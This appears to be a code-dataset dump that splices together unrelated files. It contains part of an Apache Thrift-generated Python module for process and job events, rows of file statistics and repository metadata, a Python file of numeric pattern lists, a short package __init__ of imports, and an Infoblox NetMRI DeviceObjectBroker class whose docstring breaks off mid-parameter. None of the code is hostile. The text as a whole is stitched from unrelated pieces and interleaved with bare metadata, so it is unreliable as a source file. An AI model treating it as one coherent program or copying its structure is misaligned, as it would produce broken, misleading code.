self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.tokenId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessTerminateEvent')
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 1)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 2)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
if self.tokenId is not None:
oprot.writeFieldBegin('tokenId', TType.STRING, 3)
oprot.writeString(self.tokenId.encode('utf-8') if sys.version_info[0] == 2 else self.tokenId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
if self.tokenId is None:
raise TProtocolException(message='Required field tokenId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JobStatusChangeEvent(object):
"""
Attributes:
- state
- jobIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'jobIdentity', (JobIdentifier, JobIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, jobIdentity=None,):
self.state = state
self.jobIdentity = jobIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.jobIdentity = JobIdentifier()
self.jobIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JobStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.jobIdentity is not None:
oprot.writeFieldBegin('jobIdentity', TType.STRUCT, 2)
self.jobIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.jobIdentity is None:
raise TProtocolException(message='Required field jobIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JobStatusChangeRequestEvent(object):
"""
Attributes:
- state
- jobIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'jobIdentity', (JobIdentifier, JobIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, jobIdentity=None,):
self.state = state
self.jobIdentity = jobIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.jobIdentity = JobIdentifier()
self.jobIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JobStatusChangeRequestEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.jobIdentity is not None:
oprot.writeFieldBegin('jobIdentity', TType.STRUCT, 2)
self.jobIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.jobIdentity is None:
raise TProtocolException(message='Required field jobIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Message(object):
"""
Attributes:
- event
- messageId
- messageType
- updatedTime
- messageLevel
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'event', 'BINARY', None, ), # 1
(2, TType.STRING, 'messageId', 'UTF8', "DO_NOT_SET_AT_CLIENTS", ), # 2
(3, TType.I32, 'messageType', None, None, ), # 3
(4, TType.I64, 'updatedTime', None, None, ), # 4
(5, TType.I32, 'messageLevel', None, None, ), # 5
)
def __init__(self, event=None, messageId=thrift_spec[2][4], messageType=None, updatedTime=None, messageLevel=None,):
self.event = event
self.messageId = messageId
self.messageType = messageType
self.updatedTime = updatedTime
self.messageLevel = messageLevel
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.event = iprot.readBinary()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.messageId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.messageType = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.updatedTime = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.messageLevel = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Message')
if self.event is not None:
oprot.writeFieldBegin('event', TType.STRING, 1)
oprot.writeBinary(self.event)
oprot.writeFieldEnd()
if self.messageId is not None:
oprot.writeFieldBegin('messageId', TType.STRING, 2)
oprot.writeString(self.messageId.encode('utf-8') if sys.version_info[0] == 2 else self.messageId)
oprot.writeFieldEnd()
if self.messageType is not None:
oprot.writeFieldBegin('messageType', TType.I32, 3)
oprot.writeI32(self.messageType)
oprot.writeFieldEnd()
if self.updatedTime is not None:
oprot.writeFieldBegin('updatedTime', TType.I64, 4)
oprot.writeI64(self.updatedTime)
oprot.writeFieldEnd()
if self.messageLevel is not None:
oprot.writeFieldBegin('messageLevel', TType.I32, 5)
oprot.writeI32(self.messageLevel)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.event is None:
raise TProtocolException(message='Required field event is unset!')
if self.messageId is None:
raise TProtocolException(message='Required field messageId is unset!')
if self.messageType is None:
raise TProtocolException(message='Required field messageType is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 37.769886
| 202
| 0.57595
| 5,677
| 53,180
| 5.218954
| 0.033292
| 0.017382
| 0.031288
| 0.035237
| 0.907554
| 0.89196
| 0.878763
| 0.865938
| 0.861854
| 0.856588
| 0
| 0.013967
| 0.314705
| 53,180
| 1,407
| 203
| 37.796731
| 0.799007
| 0.018484
| 0
| 0.835938
| 1
| 0
| 0.06282
| 0.004678
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091146
| false
| 0
| 0.006076
| 0.026042
| 0.217882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0dd553872a481f8f6b530c27a7e3030928b974a5
| 1,440
|
py
|
Python
|
mysite/patterns/6.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/6.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/6.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
pattern_zero=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
pattern_odd=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
pattern_even=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
averages_even={0.0: [0.0], 0.25: [0.5], 0.916666666667: [0.5], 0.138888888889: [0.8333333333333, 0.1666666666667], 0.583333333333: [0.5], 0.555555555556: [0.3333333333333, 0.6666666666667], 0.222222222222: [0.3333333333333, 0.6666666666667], 0.333333333333: [0.0], 0.805555555556: [0.8333333333333, 0.1666666666667], 0.888888888889: [0.3333333333333, 0.6666666666667], 0.472222222222: [0.8333333333333, 0.1666666666667], 0.666666666667: [0.0]}
averages_odd={0.0: [0.0], 0.25: [0.5], 0.916666666667: [0.5], 0.138888888889: [0.8333333333333, 0.1666666666667], 0.583333333333: [0.5], 0.555555555556: [0.3333333333333, 0.6666666666667], 0.222222222222: [0.3333333333333, 0.6666666666667], 0.333333333333: [0.0], 0.805555555556: [0.8333333333333, 0.1666666666667], 0.888888888889: [0.3333333333333, 0.6666666666667], 0.472222222222: [0.8333333333333, 0.1666666666667], 0.666666666667: [0.0]}
| 288
| 443
| 0.760417
| 202
| 1,440
| 5.39604
| 0.108911
| 0.036697
| 0.030275
| 0.154128
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0
| 0.769517
| 0.065972
| 1,440
| 5
| 444
| 288
| 0.040892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0de272146e387746c1a2cd50a7d91ec805d98e9c
| 205
|
py
|
Python
|
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | null | null | null |
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | null | null | null |
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | 1
|
2020-05-14T10:55:52.000Z
|
2020-05-14T10:55:52.000Z
|
from .gbs import GBS
from .extrapolation_stepper import ExtrapolationStepper
from .make_extrapolation_stepper import make_extrapolation_stepper
from .compute_rextrap_weights import compute_rextrap_weights
| 41
| 66
| 0.902439
| 25
| 205
| 7.04
| 0.4
| 0.340909
| 0.295455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078049
| 205
| 4
| 67
| 51.25
| 0.931217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21aac55631ae016f18ed0058612351d8710b960a
| 52,439
|
py
|
Python
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 12
|
2016-02-19T12:37:54.000Z
|
2022-03-04T20:11:08.000Z
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
azinfoblox/infoblox-netmri
|
02372c5231e2677ab6299cb659a73c9a41b4b0f4
|
[
"Apache-2.0"
] | 18
|
2015-11-12T18:37:00.000Z
|
2021-05-19T07:59:55.000Z
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
azinfoblox/infoblox-netmri
|
02372c5231e2677ab6299cb659a73c9a41b4b0f4
|
[
"Apache-2.0"
] | 18
|
2016-01-07T12:04:34.000Z
|
2022-03-31T11:05:41.000Z
|
from ..broker import Broker
class DeviceObjectBroker(Broker):
controller = "device_objects"
def show(self, **kwargs):
"""Shows the details for the specified device object.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_object: The device object identified by the specified DeviceObjectID.
:rtype device_object: DeviceObject
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available device objects. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this network object belongs.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjName: Name of this network object.
:type ObjName: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device objects as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceObjectID
:param sort: The data field(s) to use for sorting the output. Default is DeviceObjectID. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceObject. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_objects: An array of the DeviceObject objects that match the specified input criteria.
:rtype device_objects: Array of DeviceObject
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available device objects matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceCfgContextID: The internal NetMRI identifier of the Configuration context of declaration of this network object.
:type DeviceCfgContextID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this network object belongs.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for this network object.
:type DeviceObjectID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjArtificialInd: Flag indicating this object network does not exist in the device configuration.
:type ObjArtificialInd: Array of Boolean
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjChangedCols: The fields that changed between this revision of the record and the previous revision.
:type ObjChangedCols: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjConfigText: Original text of the definition of his network object in the device configuration.
:type ObjConfigText: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjEndTime: The ending effective time of this record, or empty if still in effect.
:type ObjEndTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjFirstSeenTime: The timestamp of when NetMRI first discovered this network object.
:type ObjFirstSeenTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjName: Name of this network object.
:type ObjName: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjProvisionData: Internal data - do not modify, may change without warning.
:type ObjProvisionData: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjStartTime: The starting effective time of this record.
:type ObjStartTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjTimestamp: The date and time this record was collected or calculated.
:type ObjTimestamp: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ObjUseCount: Total count of usage of this network by other elements of the configuration (rules, other network objects).
:type ObjUseCount: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device objects as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device object methods. The listed methods will be called on each device object returned and included in the output. Available methods are: device_cfg_context, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_cfg_context, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceObjectID
:param sort: The data field(s) to use for sorting the output. Default is DeviceObjectID. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceObject. Valid values are DeviceObjectID, DeviceID, DeviceCfgContextID, DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime, ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount, ObjArtificialInd, ObjConfigText, ObjProvisionData. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device objects, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceCfgContextID, DeviceID, DeviceObjectID, ObjArtificialInd, ObjChangedCols, ObjConfigText, ObjEndTime, ObjFirstSeenTime, ObjName, ObjProvisionData, ObjStartTime, ObjTimestamp, ObjUseCount.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_objects: An array of the DeviceObject objects that match the specified input criteria.
:rtype device_objects: Array of DeviceObject
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available device objects matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceCfgContextID, DeviceID, DeviceObjectID, ObjArtificialInd, ObjChangedCols, ObjConfigText, ObjEndTime, ObjFirstSeenTime, ObjName, ObjProvisionData, ObjStartTime, ObjTimestamp, ObjUseCount.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceCfgContextID: The operator to apply to the field DeviceCfgContextID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceCfgContextID: The internal NetMRI identifier of the Configuration context of declaration of this network object. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceCfgContextID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceCfgContextID: If op_DeviceCfgContextID is specified, the field named in this input will be compared to the value in DeviceCfgContextID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceCfgContextID must be specified if op_DeviceCfgContextID is specified.
:type val_f_DeviceCfgContextID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceCfgContextID: If op_DeviceCfgContextID is specified, this value will be compared to the value in DeviceCfgContextID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceCfgContextID must be specified if op_DeviceCfgContextID is specified.
:type val_c_DeviceCfgContextID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device to which this network object belongs. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
